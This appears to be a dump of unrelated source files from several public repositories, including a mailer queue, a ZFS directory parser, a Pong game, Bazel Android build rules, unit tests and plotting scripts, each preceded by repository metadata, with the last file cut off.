handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'%(asctime)s:%(name)s:%(levelname)s:%(message)s'
)
handler.setFormatter(formatter)
| 221 |
j5/backends/__init__.py
|
Shivam60/j5
| 0 |
2024598
|
"""Backend classes."""
from .backend import Backend, CommunicationError, Environment
__all__ = ["Backend", "CommunicationError", "Environment"]
| 146 |
tests/test_app/sa/orm/app.py
|
ckkz-it/aiohttp-rest-framework
| 7 |
2024254
|
import typing
from functools import partial
from aiohttp import web
from aiohttp_rest_framework import APP_CONFIG_KEY, create_connection
from tests.test_app.base_app import get_base_app
async def init_db(app_conn_prop: str, db_url: str, app: web.Application) -> None:
app[app_conn_prop] = await create_connection(db_url)
async def close_db(app_conn_prop: str, app: web.Application) -> None:
await app[app_conn_prop].dispose()
def create_application(db_url: str, rest_config: typing.Mapping = None):
app = get_base_app(rest_config=rest_config)
app_conn_prop = app[APP_CONFIG_KEY].app_connection_property
app.on_startup.append(partial(init_db, app_conn_prop, db_url))
app.on_cleanup.append(partial(close_db, app_conn_prop))
return app
| 769 |
python/test/test_qulacs.py
|
mshrn/qulacs
| 1 |
2024376
|
# set library dir
import sys
for ind in range(1,len(sys.argv)):
sys.path.append(sys.argv[ind])
sys.argv = sys.argv[:1]
import numpy as np
import unittest
import qulacs
class TestQuantumState(unittest.TestCase):
def setUp(self):
self.n = 4
self.dim = 2**self.n
self.state = qulacs.QuantumState(self.n)
def tearDown(self):
del self.state
def test_state_dim(self):
vector = self.state.get_vector()
self.assertEqual(len(vector),self.dim, msg = "check vector size")
def test_zero_state(self):
self.state.set_zero_state()
vector = self.state.get_vector()
vector_ans = np.zeros(self.dim)
vector_ans[0]=1.
self.assertTrue(((vector-vector_ans)<1e-10).all(), msg = "check set_zero_state")
def test_comp_basis(self):
pos = 0b0101
self.state.set_computational_basis(pos)
vector = self.state.get_vector()
vector_ans = np.zeros(self.dim)
vector_ans[pos]=1.
self.assertTrue(((vector-vector_ans)<1e-10).all(), msg = "check set_computational_basis")
class TestQuantumCircuit(unittest.TestCase):
def setUp(self):
self.n = 4
self.dim = 2**self.n
self.state = qulacs.QuantumState(self.n)
self.circuit = qulacs.QuantumCircuit(self.n)
def tearDown(self):
del self.state
del self.circuit
def test_make_bell_state(self):
self.circuit.add_H_gate(0)
self.circuit.add_CNOT_gate(0,1)
self.state.set_zero_state()
self.circuit.update_quantum_state(self.state)
vector = self.state.get_vector()
vector_ans = np.zeros(self.dim)
vector_ans[0] = np.sqrt(0.5)
vector_ans[3] = np.sqrt(0.5)
self.assertTrue(((vector-vector_ans)<1e-10).all(), msg = "check make bell state")
if __name__ == "__main__":
unittest.main()
| 1,884 |
ob2/mailer/__init__.py
|
hantaowang/ob2
| 17 |
2024609
|
import logging
import smtplib
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.utils import make_msgid
from flask import url_for
from jinja2 import Environment, PackageLoader
from os.path import basename
from werkzeug.urls import url_unparse
import ob2.config as config
from ob2.database import DbCursor
from ob2.util.hooks import apply_filters
from ob2.util.templating import JINJA_EXPORTS
from ob2.util.resumable_queue import ResumableQueue
jinja_environment = None
app = None
def send_template(*args, **kwargs):
"""
Enqueues an email to be sent on the background thread. See docstring for create_email for
arguments.
"""
if not config.mailer_enabled:
raise RuntimeError("Cannot send mail while mailer is disabled")
email = create_email(*args, **kwargs)
with DbCursor() as c:
job = mailer_queue.create(c, "send", email)
mailer_queue.enqueue(job)
def create_email(_template_name, _to, _subject, _from=None, _attachments=[],
_message_id=None, **kwargs):
"""
Prepares an email to be sent by the email queue background thread. Templates are taken from
templates/*.html and templates/*.txt. Both a HTML and a plain text template is expected to be
present. Parameters should be passed as keyword arguments to this function.
_template_name
_to
_subject
_from
_attachments -- Tuples of (type, file_path) where type should be "pdf" (only pdfs are
supported right now)
_message_id -- If this message is a REPLY, then specify the message ID(s) of the
previous messages in this chain.
Returns an opaque object (spoiler: it's a tuple) which should be passed directly to
mailer_queue.enqueue().
"""
if not config.mailer_enabled:
raise RuntimeError("Cannot create mail while mailer is disabled")
if _from is None:
_from = config.mailer_from
msg = MIMEMultipart('alternative')
msg['Subject'] = _subject
msg['From'] = _from
msg['To'] = _to
msg['Message-Id'] = make_msgid()
if _message_id:
msg['References'] = _message_id
msg['In-Reply-To'] = _message_id
body_plain = render_template("%s.txt" % _template_name, **kwargs)
body_html = render_template("%s.html" % _template_name, **kwargs)
msg.attach(MIMEText(body_plain, 'plain', 'utf-8'))
msg.attach(MIMEText(body_html, 'html', 'utf-8'))
for attachment_type, attachment_path in _attachments:
attachment_name = basename(attachment_path)
with open(attachment_path, "rb") as attachment_file:
attachment_bytes = attachment_file.read()
if attachment_type == "pdf":
attachment = MIMEApplication(attachment_bytes, _subtype="pdf")
attachment.add_header("Content-Disposition", "attachment", filename=attachment_name)
msg.attach(attachment)
else:
raise ValueError("Unsupported attachment type: %s" % attachment_type)
return _from, _to, msg.as_string()
def get_jinja_environment():
global jinja_environment
if jinja_environment is None:
jinja_environment = Environment(loader=PackageLoader("ob2.mailer", "templates"))
jinja_environment.globals.update(JINJA_EXPORTS)
jinja_environment.globals["url_for"] = url_for
return jinja_environment
def render_template(template_file_name, **kwargs):
if app is None:
raise RuntimeError("No web application registered with mailer")
template = get_jinja_environment().get_template(template_file_name)
base_url = url_unparse(("https" if config.web_https else "http",
config.web_public_host, "/", "", ""))
with app.test_request_context(base_url=base_url):
return template.render(**kwargs)
def register_app(app_):
"""
Sets the global web application `app`, for use in generating external web URLs for email
templates. We cannot import this directly, because it creates a cyclic dependency.
"""
global app
if app is not None:
raise ValueError("Mailer global app has already been initialized")
app = app_
class MailerQueue(ResumableQueue):
queue_name = "mailerqueue"
database_table = "mailerqueue"
def process_job(self, operation, payload):
"""
Connects to the configured SMTP server using connect_to_smtp defined in config/algorithms
and sends an email.
"""
if operation == "send":
# This is a useful hook for changing the SMTP server that is used by the mail queue. You
# can, for example, connect to a 3rd party email relay to send emails. You can also just
# connect to 127.0.0.1 (there's a mail server running on most of the INST servers).
#
# Arguments:
# smtp_server -- A smtplib.SMTP() object.
#
# Returns:
# An smtplib.SMTP() object (or compatible) that can be used to send mail.
smtp_server = apply_filters("connect-to-smtp", smtplib.SMTP())
smtp_server.sendmail(*payload)
smtp_server.quit()
else:
logging.warning("Unknown operation requested in mailerqueue: %s" % operation)
mailer_queue = MailerQueue()
def main():
mailer_queue.run()
| 5,465 |
src/jf/schema.py
|
diseaz-joom/dsaflow
| 0 |
2024072
|
#!/usr/bin/python3
# -*- mode: python; coding: utf-8 -*-
from typing import List, Dict, TypeVar, Type, Optional, Generic, overload, Union, Callable, Protocol
import functools
from dsapy.algs import strconv
from jf import git
class Error(Exception):
'''Base for errors in the module.'''
SEPARATOR = '.'
class Holder(Protocol):
@property
def config(self) -> Dict[str, List[str]]:
raise NotImplementedError
def set(self, name: str, value: str) -> None:
raise NotImplementedError
def reset(self, name: str, value: str) -> None:
raise NotImplementedError
def append(self, name: str, value: str) -> None:
raise NotImplementedError
def unset(self, name: str) -> None:
raise NotImplementedError
class Cfg:
def __init__(self, cfg: Holder) -> None:
self.cfg = cfg
@property
def raw(self) -> Dict[str, List[str]]:
return self.cfg.config
class Path:
def __init__(self, path: List[str]) -> None:
self.path_list = path
@functools.cached_property
def path(self) -> str:
return SEPARATOR.join(self.path_list)
class CfgPath(Cfg, Path):
def __init__(self, base: 'CfgPath', path: List[str]) -> None:
Cfg.__init__(self, base.cfg)
Path.__init__(self, base.path_list + path)
class SectionCfg(CfgPath):
@functools.cached_property
def keys(self) -> List[str]:
prefix = self.path + SEPARATOR
return list({
k[len(prefix):].partition(SEPARATOR)[0]
for k in self.raw.keys()
if k.startswith(prefix)
})
TValue = TypeVar('TValue')
class ValueType(Protocol[TValue]):
def from_string(self, s: str) -> TValue:
raise NotImplementedError
def to_string(self, v: TValue) -> str:
raise NotImplementedError
class _SimpleType(Generic[TValue], ValueType[TValue]):
def __init__(self, t: Callable[[str], TValue]) -> None:
self.t = t
def from_string(self, s: str) -> TValue:
return self.t(s)
def to_string(self, v: TValue) -> str:
return str(v)
class _BoolType(ValueType[bool]):
def from_string(self, s: str) -> bool:
return strconv.parse_bool(s)
def to_string(self, v: bool) -> str:
return str(v).lower()
StrType = _SimpleType(str)
BranchType = _SimpleType(git.BranchName)
IntType = _SimpleType(int)
BoolType = _BoolType()
class MaybeValueCfg(Generic[TValue], CfgPath):
def __init__(self, base: CfgPath, path: List[str], t: ValueType[TValue]) -> None:
CfgPath.__init__(self, base, path)
self.t = t
@functools.cached_property
def value(self) -> Optional[TValue]:
v_list = self.raw.get(self.path, [])
if not v_list:
return None
return self.t.from_string(v_list[0])
def set(self, value: TValue) -> None:
self.cfg.set(self.path, self.t.to_string(value))
def set_str(self, s: str) -> None:
self.set(self.t.from_string(s))
class ValueCfg(Generic[TValue], CfgPath):
def __init__(self, base: CfgPath, path: List[str], t: ValueType[TValue], default: TValue) -> None:
CfgPath.__init__(self, base, path)
self.t = t
self.default = default
@functools.cached_property
def value(self) -> TValue:
v_list = self.raw.get(self.path, [])
if not v_list:
return self.default
return self.t.from_string(v_list[0])
def set(self, value: TValue) -> None:
self.cfg.set(self.path, self.t.to_string(value))
def set_str(self, s: str) -> None:
self.set(self.t.from_string(s))
class ListValueCfg(Generic[TValue], CfgPath):
def __init__(self, base: CfgPath, path: List[str], t: ValueType[TValue]) -> None:
CfgPath.__init__(self, base, path)
self.t = t
@functools.cached_property
def value(self) -> List[TValue]:
return [self.t.from_string(v) for v in self.raw.get(self.path, [])]
def set(self, value: List[TValue]) -> None:
if not value:
self.cfg.unset(self.path)
return
self.cfg.reset(self.path, self.t.to_string(value[0]))
for v in value[1:]:
self.cfg.append(self.path, self.t.to_string(v))
def append(self, value: TValue) -> None:
self.cfg.append(self.path, self.t.to_string(value))
def set_str(self, ss: List[str]) -> None:
self.set([self.t.from_string(s) for s in ss])
def append_str(self, s: str) -> None:
self.append(self.t.from_string(s))
class MapCfg(Generic[TValue], SectionCfg):
def __init__(
self,
base: CfgPath,
path: List[str],
factory: Callable[[CfgPath, List[str]], TValue],
) -> None:
SectionCfg.__init__(self, base, path)
self.factory = factory
def __getitem__(self, name: str) -> TValue:
return self.factory(self, [name])
_NOT_FOUND = object()
TCacher = TypeVar('TCacher', bound='Cacher')
class SchemaField:
'''Base class to indicate schema fields.'''
class Cacher(Generic[TCacher, TValue], SchemaField):
def __init__(self: TCacher) -> None:
self.attrname = ''
def __set_name__(self: TCacher, owner: type, name: str) -> None:
if not self.attrname:
self.attrname = name
elif name != self.attrname:
raise TypeError(
"Cannot assign the same Cacher to two different names "
f"({self.attrname!r} and {name!r})."
)
@overload
def __get__(self: TCacher, instance: None, owner: type) -> TCacher:
pass
@overload
def __get__(self: TCacher, instance: SectionCfg, owner: type) -> TValue:
pass
def __get__(self: TCacher, instance: Optional[SectionCfg], owner: type) -> Union[TCacher, TValue]:
if instance is None:
return self
cache = instance.__dict__
val = cache.get(self.attrname, _NOT_FOUND)
if val is _NOT_FOUND:
val = self.generate(instance)
cache[self.attrname] = val
return val
def generate(self: TCacher, instance: SectionCfg) -> TValue:
raise NotImplementedError
TSectionCfg = TypeVar('TSectionCfg', bound='SectionCfg')
class Section(Generic[TSectionCfg], Cacher['Section', TSectionCfg]):
def __init__(self, t: Type[TSectionCfg], path: List[str]) -> None:
Cacher.__init__(self)
self.t = t
self.path = path
def generate(self, instance: SectionCfg) -> TSectionCfg:
return self.t(instance, self.path)
class MaybeValue(Generic[TValue], Cacher['MaybeValue', MaybeValueCfg[TValue]]):
def __init__(self, t: ValueType[TValue], path: List[str]) -> None:
Cacher.__init__(self)
self.t = t
self.path = path
def generate(self, instance: SectionCfg) -> MaybeValueCfg[TValue]:
return MaybeValueCfg(instance, self.path, self.t)
class Value(Generic[TValue], Cacher['Value', ValueCfg[TValue]]):
def __init__(self, t: ValueType[TValue], path: List[str], default: TValue) -> None:
Cacher.__init__(self)
self.t = t
self.default = default
self.path = path
def generate(self, instance: SectionCfg) -> ValueCfg[TValue]:
return ValueCfg(instance, self.path, self.t, self.default)
class ListValue(Generic[TValue], Cacher['ListValue', ListValueCfg[TValue]]):
def __init__(self, t: ValueType[TValue], path: List[str]) -> None:
Cacher.__init__(self)
self.t = t
self.path = path
def generate(self, instance: SectionCfg) -> ListValueCfg[TValue]:
return ListValueCfg(instance, self.path, self.t)
class Map(Generic[TValue], Cacher['Map', MapCfg[TValue]]):
def __init__(self, factory: Callable[[CfgPath, List[str]], TValue], path: List[str]) -> None:
Cacher.__init__(self)
self.factory = factory
self.path = path
def generate(self, instance: SectionCfg) -> MapCfg[TValue]:
return MapCfg(instance, self.path, self.factory)
class Root(SectionCfg):
'''Config with schema.'''
def __init__(self, cfg: Holder) -> None:
self.cfg = cfg
self.path_list: List[str] = []
| 8,211 |
tools/build/rules/android.bzl
|
zakerinasab/gapid
| 1 |
2023725
|
# Copyright (C) 2018 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
load("//tools/build/rules:common.bzl", "copy")
def android_native(name, deps=[], **kwargs):
copied = name+"fake-src"
copy(
name=copied,
src="//tools/build/rules:Ignore.java",
dst="Ignore{}.java".format(name),
visibility = ["//visibility:private"],
)
native.android_binary(
name = name,
deps = deps,
manifest = "//tools/build/rules:AndroidManifest.xml",
custom_package = "com.google.android.gapid.ignore",
srcs = [":"+copied],
**kwargs
)
def _android_cc_binary_impl(ctx):
outs = []
groups = {}
base = ctx.attr.out
if base == "":
base = ctx.label.name
for cpu, binary in ctx.split_attr.dep.items():
src = binary.files.to_list()[0]
out = ctx.actions.declare_file(cpu + "/" + base)
ctx.actions.run_shell(
command = "cp \"" + src.path + "\" \"" + out.path + "\"",
inputs = [src],
outputs = [out]
)
outs += [out]
groups[cpu] = [out]
return [
DefaultInfo(files = depset(outs)),
OutputGroupInfo(**groups),
]
_android_cc_binary = rule(
implementation = _android_cc_binary_impl,
attrs = {
"out": attr.string(),
"dep": attr.label(
cfg = android_common.multi_cpu_configuration,
allow_files = True,
),
},
)
def android_native_binary(name, out = "", **kwargs):
visibility = kwargs.pop("visibility", default = ["//visibility:public"])
native.cc_binary(
name = name + "-bin",
visibility = ["//visibility:private"],
**kwargs
)
_android_cc_binary(
name = name,
out = out,
dep = ":" + name + "-bin",
visibility = visibility,
)
def _android_native_app_glue_impl(ctx):
ctx.symlink(
ctx.path(ctx.os.environ["ANDROID_NDK_HOME"] +
"/sources/android/native_app_glue/android_native_app_glue.c"),
"android_native_app_glue.c")
ctx.symlink(
ctx.path(ctx.os.environ["ANDROID_NDK_HOME"] +
"/sources/android/native_app_glue/android_native_app_glue.h"),
"android_native_app_glue.h")
ctx.file("BUILD", "\n".join([
"cc_library(",
" name = \"native_app_glue\",",
" srcs = [\"android_native_app_glue.c\", \"android_native_app_glue.h\"],",
" hdrs = [\"android_native_app_glue.h\"],",
" visibility = [\"//visibility:public\"],",
")"
]))
android_native_app_glue = repository_rule(
implementation = _android_native_app_glue_impl,
local = True,
environ = [
"ANDROID_NDK_HOME",
]
)
# Retrieve Vulkan validation layers from the Android NDK
def _ndk_vk_validation_layer(ctx):
build = ""
for abi in ["armeabi-v7a", "arm64-v8a", "x86", "x86_64"]:
for layer in ["core_validation", "object_tracker", "parameter_validation", "threading", "unique_objects"]:
layerpath = abi + "/libVkLayer_" + layer + ".so"
ctx.symlink(
ctx.path(ctx.os.environ["ANDROID_NDK_HOME"] +
"/sources/third_party/vulkan/src/build-android/jniLibs/" + layerpath),
ctx.path(layerpath),
)
build += "\n".join([
"cc_library(",
" name = \"" + abi + "\",",
" srcs = glob([\"" + abi + "/libVkLayer*.so\"]),",
" visibility = [\"//visibility:public\"],",
")",
]) + "\n"
ctx.file("BUILD", build)
ndk_vk_validation_layer = repository_rule(
implementation = _ndk_vk_validation_layer,
local = True,
environ = [
"ANDROID_NDK_HOME",
],
)
| 4,252 |
tests/test_ondiff.py
|
slarse/ondiff
| 0 |
2024712
|
import ondiff
def test_placeholder():
"""Placeholder test until there are some real tests."""
# TODO Remove this test
assert ondiff
| 146 |
pytglib/api/types/public_chat_type_is_location_based.py
|
iTeam-co/pytglib
| 6 |
2024650
|
from ..utils import Object
class PublicChatTypeIsLocationBased(Object):
"""
The chat is public, because it is a location-based supergroup
Attributes:
ID (:obj:`str`): ``PublicChatTypeIsLocationBased``
No parameters required.
Returns:
PublicChatType
Raises:
:class:`telegram.Error`
"""
ID = "publicChatTypeIsLocationBased"
def __init__(self, **kwargs):
pass
@staticmethod
def read(q: dict, *args) -> "PublicChatTypeIsLocationBased":
return PublicChatTypeIsLocationBased()
| 583 |
day1.py
|
jvansan/AdventOfCode2019
| 0 |
2023975
|
import math
from pathlib import Path
def read_file(fname):
f = Path(fname)
with open(f) as inp:
data = inp.readlines()
return (int(x) for x in data)
def calc_fuel(x):
return math.floor(x/3.)-2
def calc_fuel_with_fuel(x):
fuel = calc_fuel(x)
x = fuel
while True:
y = calc_fuel(x)
if y > 0:
x = y
fuel += y
else:
break
return fuel
def test_calc_fuel():
assert calc_fuel(12) == 2
assert calc_fuel(14) == 2
assert calc_fuel(1969) == 654
assert calc_fuel(100756) == 33583
def main():
# Run test
test_calc_fuel()
inputs = list(read_file("./input/day1.txt"))
fuel = map(calc_fuel, inputs)
print("Part 1:")
print(f"Total fuel needed is : {sum(fuel)}")
print("Part 2:")
all_fuel = map(calc_fuel_with_fuel, inputs)
print(f"Total fuel needed (with fuel of fuel) is : {sum(all_fuel)}")
if __name__ == "__main__":
main()
| 977 |
reactiveX/cpu_utilize.py
|
decaun/easy-python-study
| 1 |
2023510
|
import multiprocessing
import random
import time
from threading import current_thread
import rx
from rx.scheduler import ThreadPoolScheduler
from rx import operators as ops
def intense_calculation(value):
# sleep for a random short duration between 0.5 to 2.0 seconds to simulate a long-running calculation
time.sleep(random.randint(5, 20) * 0.1)
return value
# calculate number of CPU's, then create a ThreadPoolScheduler with that number of threads
optimal_thread_count = multiprocessing.cpu_count()
pool_scheduler = ThreadPoolScheduler(optimal_thread_count)
# Create Process 1
rx.of("Alpha", "Beta", "Gamma", "Delta", "Epsilon").pipe(
ops.map(lambda s: intense_calculation(s)), ops.subscribe_on(pool_scheduler)
).subscribe(
on_next=lambda s: print("PROCESS 1: {0} {1}".format(current_thread().name, s)),
on_error=lambda e: print(e),
on_completed=lambda: print("PROCESS 1 done!"),
)
# Create Process 2
rx.range(1, 10).pipe(
ops.map(lambda s: intense_calculation(s)), ops.subscribe_on(pool_scheduler)
).subscribe(
on_next=lambda i: print("PROCESS 2: {0} {1}".format(current_thread().name, i)),
on_error=lambda e: print(e),
on_completed=lambda: print("PROCESS 2 done!"),
)
# Create Process 3, which is infinite
rx.interval(1).pipe(
ops.map(lambda i: i * 100),
ops.observe_on(pool_scheduler),
ops.map(lambda s: intense_calculation(s)),
).subscribe(
on_next=lambda i: print("PROCESS 3: {0} {1}".format(current_thread().name, i)),
on_error=lambda e: print(e),
)
input("Press any key to exit\n")
| 1,564 |
tprmp/utils/loading.py
|
anindex/tp-rmp
| 7 |
2022784
|
import pickle
import numpy as np
from tprmp.demonstrations.base import Demonstration
from tprmp.demonstrations.quaternion import q_convert_wxyz
from tprmp.demonstrations.manifold import Manifold
def load(demo_file):
with open(demo_file, 'rb') as f:
data = pickle.load(f)
return data
def save_demos(demo_file, trajs, traj_vels, frames, tags, dt=0.01):
data = {'trajs': trajs, 'traj_vel': traj_vels, 'frames': frames, 'tags': tags, 'dt': dt}
with open(demo_file, 'wb') as f:
pickle.dump(data, f)
def load_demos(data_file, smooth=True, tag=None, convert_wxyz=True):
'''Load data into Demonstration class with format xyzwxyz'''
data = load(data_file)
dt = data['dt']
demos = []
if convert_wxyz:
for k, v in data['frames'].items():
if isinstance(v, list):
for m in range(len(v)):
v[m][3:] = q_convert_wxyz(v[m][3:]) # convert to wxyz
else:
v[3:] = q_convert_wxyz(v[3:])
manifold = Manifold.get_manifold_from_name('R^3 x S^3')
for m in range(len(data['trajs'])):
if tag is not None and data['tags'][m] != tag:
continue
if convert_wxyz:
data['trajs'][m][3:] = q_convert_wxyz(data['trajs'][m][3:])
demo = Demonstration(data['trajs'][m], smooth=smooth, manifold=manifold, dt=dt, tag=data['tags'][m])
for k, v in data['frames'].items():
p = v[m] if isinstance(v, list) else v
demo.add_frame_from_pose(p, k)
demos.append(demo)
return demos
def load_demos_2d(data_file, smooth=True, dt=0.01, first=True):
'''Load 2d demonstrations'''
data = load(data_file)
demos = []
manifold = Manifold.get_euclidean_manifold(2)
if isinstance(data, list):
data = np.array(data)
start_f, end_f = data[0][:, 0], data[0][:, -1]
for d in data:
demo = Demonstration(d, manifold=manifold, dt=dt)
if first:
demo.add_frame_from_pose(start_f, 'start')
demo.add_frame_from_pose(end_f, 'end')
else:
demo.add_frame_from_pose(d[:, 0], 'start')
demo.add_frame_from_pose(d[:, -1], 'end')
demos.append(demo)
return demos
| 2,243 |
zfs/posix/directory.py
|
mcclung/zfsp
| 600 |
2023845
|
import logging
import os
from typing import Iterator
from typing import Tuple
from typing import Any
from typing import Sequence
import pyndata
import zfs.posix
from . import PosixObject
from .attributes import PosixType
logger = logging.getLogger(__name__)
class DirectoryEntry(pyndata.Struct):
# this is not a real on-disk struct
__ENDIAN__ = 'little'
name = pyndata.nullstring(max_length=256)
value = pyndata.uint64()
value.__SHOW__ = False
object_type = pyndata.BitField(value, 4, 60, enum=PosixType)
number = pyndata.BitField(value, 48)
class Directory(PosixObject):
def __init__(self, dnode, entries, dataset, objectset, path=None):
super().__init__(dnode, dataset)
self.entries = entries
self.path = path
self.objectset = objectset
self.resolved_entries = {}
def __contains__(self, name: str) -> bool:
return name in self.entries
def __getitem__(self, name: str) -> Any:
joined_path = os.path.join(self.path, name)
if name not in self.resolved_entries:
try:
entry_value = self.entries[name]
entry = DirectoryEntry(name=name, value=entry_value)
obj = self.objectset[entry.number]
if isinstance(obj, (Directory, zfs.posix.File)):
obj.path = joined_path
self.resolved_entries[name] = obj
except Exception:
logger.warning('directory lookup failed for {}'.format(joined_path))
raise FileNotFoundError(joined_path)
return self.resolved_entries[name]
def keys(self) -> Sequence[str]:
return self.entries.keys()
def items(self) -> Iterator[Tuple[str, Any]]:
return ((k, self[k]) for k in self.keys())
def __repr__(self) -> str:
return 'Directory {path} {entries}'.format(path=self.path, entries=list(self.keys()))
| 1,933 |
game.py
|
RosaleeKnight/pong
| 0 |
2023901
|
import pygame, sys, random
def ball_animation():
global ball_speed_x, ball_speed_y
ball.x += ball_speed_x
ball.y += ball_speed_y
if ball.top <= 0 or ball.bottom >= screen_height:
ball_speed_y *= -1
if ball.left <= 0 or ball.right >= screen_width:
ball_restart()
if ball.colliderect(player) or ball.colliderect(opponent):
ball_speed_x *= -1
def player_animation():
player.y += player_speed
if player.top <= 0:
player.top = 0
if player.bottom >= screen_height:
player.bottom = screen_height
def opponent_ai():
if opponent.top < ball.y:
opponent.top += opponent_speed
if opponent.bottom > ball.y:
opponent.bottom -= opponent_speed
if opponent.top <= 0:
opponent.top = 0
if opponent.bottom >= screen_height:
opponent.bottom = screen_height
def ball_restart():
global ball_speed_x, ball_speed_y
ball.center = (screen_width/2,screen_height/2)
ball_speed_y *= random.choice((1,-1))
ball_speed_x *= random.choice((1,-1))
pygame.init()
clock = pygame.time.Clock()
screen_width = 800
screen_height = 400
screen = pygame.display.set_mode((screen_width,screen_height))
pygame.display.set_caption('Pong')
ball = pygame.Rect(screen_width/2 - 15,screen_height/2 - 15,30,30)
player = pygame.Rect(screen_width - 20,screen_height/2 - 70,10,140)
opponent = pygame.Rect(10,screen_height/2 - 70,10,140)
bg_color = pygame.Color('grey12')
light_grey = (200,200,200)
ball_speed_x = 7 * random.choice((1,-1))
ball_speed_y = 7 * random.choice((1,-1))
player_speed = 0
opponent_speed = 7
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_DOWN:
player_speed += 7
if event.key == pygame.K_UP:
player_speed -= 7
if event.type == pygame.KEYUP:
if event.key == pygame.K_DOWN:
player_speed -= 7
if event.key == pygame.K_UP:
player_speed += 7
ball_animation()
player_animation()
opponent_ai()
screen.fill(bg_color)
pygame.draw.rect(screen,light_grey, player)
pygame.draw.rect(screen,light_grey, opponent)
pygame.draw.ellipse(screen,light_grey, ball)
pygame.draw.aaline(screen,light_grey,(screen_width/2,0), (screen_width/2,screen_height))
pygame.display.flip()
clock.tick(60)
| 2,524 |
POO_I/aula2/ex_aula2_23_03_21/aula2.py
|
saul-rocha/POO_I
| 0 |
2022736
|
l1 = input("lado 1: ")
l2 = input("lado 2: ")
l3 = input("lado 3: ")
if l1 > (l2+l3) or l2 > (l1+l3) or l3 >(l2+l1):
print("Nao forma triangulo")
elif l1 == l2 and l1 == l3:
print("Equilátero")
elif l1 != l2 and l2 != l3 and l1 != l3:
print("Escaleno")
else:
print("Isoceles")
| 299 |
cnns/graphs/hessians/highest_eigenvalues.py
|
adam-dziedzic/time-series-ml
| 1 |
2023597
|
import matplotlib
# matplotlib.use('TkAgg')
matplotlib.rcParams['pdf.fonttype'] = 42
matplotlib.rcParams['ps.fonttype'] = 42
import matplotlib.pyplot as plt
import csv
import os
print(matplotlib.get_backend())
# plt.interactive(True)
# http://ksrowell.com/blog-visualizing-data/2012/02/02/optimal-colors-for-graphs/
MY_BLUE = (56, 106, 177)
MY_RED = (204, 37, 41)
MY_ORANGE = (218, 124, 48)
MY_GREEN = (62, 150, 81)
MY_BLACK = (83, 81, 84)
MY_GOLD = (148, 139, 61)
def get_color(COLOR_TUPLE_255):
return [x / 255 for x in COLOR_TUPLE_255]
# fontsize=20
fontsize = 30
legend_size = 22
title_size = 30
font = {'size': fontsize}
matplotlib.rc('font', **font)
dir_path = os.path.dirname(os.path.realpath(__file__))
print("dir path: ", dir_path)
GPU_MEM_SIZE = 16280
wrt = 'inputs'
# wrt = 'model_parameters'
def read_columns(dataset, columns=5):
file_name = dir_path + "/" + dataset
with open(file_name) as csvfile:
data = csv.reader(csvfile, delimiter=";", quotechar='|')
cols = []
for column in range(columns):
cols.append([])
for i, row in enumerate(data):
if i == 0:
continue # omit the header
for column in range(columns):
try:
# print('column: ', column)
cols[column].append(float(row[column]))
except ValueError as ex:
print("Exception: ", ex)
return cols
def read_rows(dataset, row_nr=None):
file_name = dir_path + "/" + dataset
rows = []
with open(file_name) as csvfile:
data = csv.reader(csvfile, delimiter=";", quotechar='|')
for i, row in enumerate(data):
result = []
if rows and i > row_nr:
break
for val in row:
try:
# print('column: ', column)
result.append(float(val))
except ValueError as ex:
print("Exception: ", ex)
rows.append(result)
return rows
ylabel = "ylabel"
title = "title"
legend_pos = "center_pos"
bbox = "bbox"
file_name = "file_name"
column_nr = "column_nr"
row_nr = "row_nr"
labels = "labels"
legend_cols = "legend_cols"
xlim = "xlim"
ylim = "ylim"
original = { # ylabel: "L2 adv",
# file_name: "../../nnlib/robustness/2019-09-11-21-11-34-525829-len-32-org-images-eigenvals",
# file_name: "../../nnlib/robustness/2019-09-12-09-15-11-046445-len-32-org-images-eigenvals",
# file_name: "../../nnlib/robustness/2019-09-12-09-39-58-229597-len-1-org_recovered-images-eigenvals",
# file_name: "../../nnlib/robustness/2019-09-12-15-52-21-873237-len-5-org-images-eigenvals-min-avg-max",
# file_name: "../../nnlib/robustness/2019-09-12-16-03-19-884343-len-17-org-images-eigenvals-confidence",
file_name: "../../nnlib/robustness/2019-09-12-10-28-45-366327-len-62-org-images-highest_eigenvalues",
title: "original",
# legend_pos: "lower left",
legend_pos: "upper right",
# bbox: (0.0, 0.0),
column_nr: 3,
row_nr: 1,
legend_cols: 3,
labels: ['original'],
xlim: (0, 100),
ylim: (0, 100)}
adversarial = { # ylabel: "L2 adv",
# file_name: "../../nnlib/robustness/2019-09-11-21-11-34-525829-len-32-adv-images-eigenvals",
# file_name: "../../nnlib/robustness/2019-09-12-09-15-11-040897-len-32-adv-images-eigenvals",
# file_name: "../../nnlib/robustness/2019-09-12-09-39-58-229330-len-1-adv_recovered-images-eigenvals",
# file_name: "../../nnlib/robustness/2019-09-12-15-52-21-871557-len-5-adv-images-eigenvals-min-avg-max",
# file_name: "../../nnlib/robustness/2019-09-12-16-03-19-881953-len-17-adv-images-eigenvals-confidence",
file_name: "../../nnlib/robustness/2019-09-12-10-28-45-352351-len-62-adv-images-highest_eigenvalues",
title: "adversarial",
# legend_pos: "lower left",
legend_pos: "upper right",
# bbox: (0.0, 0.0),
column_nr: 3,
row_nr: 1,
legend_cols: 3,
labels: ['adversarial'],
xlim: (0, 100),
ylim: (0, 100)}
gauss = { # ylabel: "L2 adv",
# file_name: "../../nnlib/robustness/2019-09-11-21-11-34-525829-len-32-adv-images-eigenvals",
# file_name: "../../nnlib/robustness/2019-09-12-09-15-11-050891-len-32-gauss-images-eigenvals",
# file_name: "../../nnlib/robustness/2019-09-12-09-39-58-229856-len-1-gauss_recovered-images-eigenvals",
# file_name: "../../nnlib/robustness/2019-09-12-15-52-21-874077-len-5-gauss-images-eigenvals-min-avg-max",
# file_name: "../../nnlib/robustness/2019-09-12-16-03-19-886454-len-17-gauss-images-eigenvals-confidence",
file_name: "../../nnlib/robustness/2019-09-12-10-28-45-374723-len-62-gauss-images-highest_eigenvalues",
